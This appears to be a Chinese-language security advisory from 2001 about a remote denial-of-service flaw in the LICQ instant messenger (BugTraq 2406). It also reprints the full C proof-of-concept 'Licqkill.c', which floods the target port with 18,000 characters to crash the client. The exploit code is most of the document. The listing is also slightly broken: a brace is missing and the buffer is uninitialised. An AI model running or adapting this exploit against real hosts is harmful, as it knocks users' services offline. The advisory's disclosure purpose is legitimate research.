发布日期：2001-03-01
更新日期：2001-03-01

受影响系统：

    LICQ LICQ 1.0.2
    LICQ LICQ 1.0.1
    LICQ LICQ .85

描述：

---

BUGTRAQ ID: 2406

上述版本的LICQ容易遭受拒绝服务攻击。向LICQ侦听端口发送12000到16000个字符将
导致LICQ崩溃，需要重启才能恢复正常功能。

<* 来源：Stan Bubrouski (stan@ccs.neu.edu) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
* Name: Licqkill.c
* Author: Stan Bubrouski <stan@ccs.neu.edu>
* Date: December 26, 2000
* Description: Licq will crash when 16707 or more characters are sent to
the port
*              Licq is listening on.  Finding the port Licq is running on
is pretty
*              simple because by default it starts using ports around 1100
or so.  This
*              has been tested against Licq v.85 and v1.0.2
* Purpose: Proof-of-concept tool for the Licq Denial of Service
vulnerability.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv)
{
char buf[18000];
int i, sock, result;
struct sockaddr_in sin;
struct hostent *hn;

printf("licqkill.c - Licq remote DoS by Stan Bubrouski
<stan@ccs.neu.edu>\n\n");

if (argc < 3)
{
  fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
  exit(-1);
}

hn = gethostbyname(argv[1]);

if (!hn)
{
  fprintf(stderr, "%s: host lookup failure\n", argv[1]);
  exit(-1);
}

sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr = *(struct in_addr *)hn->h_addr;
sock = socket(AF_INET, SOCK_STREAM, 0);
result = connect(sock, (struct sockaddr *)&sin, sizeof(struct
sockaddr_in));

if (result != 0)


  fprintf(stderr, "Failed to establish connection to %s\n", argv[1]);
  exit(-1);
}

if (sock < 0)
{
  fprintf(stderr, "Socket error.");
  exit(-1);
}

for (i=0; i<18000; i++)
  strncat(buf, "A", 1);
send(sock, buf, sizeof(buf), 0);
close(sock);
fprintf(stdout, "Data sent\n\n");
}


建议：

---

厂商补丁：

   暂无



浏览次数：4268
严重程度：0（网友投票）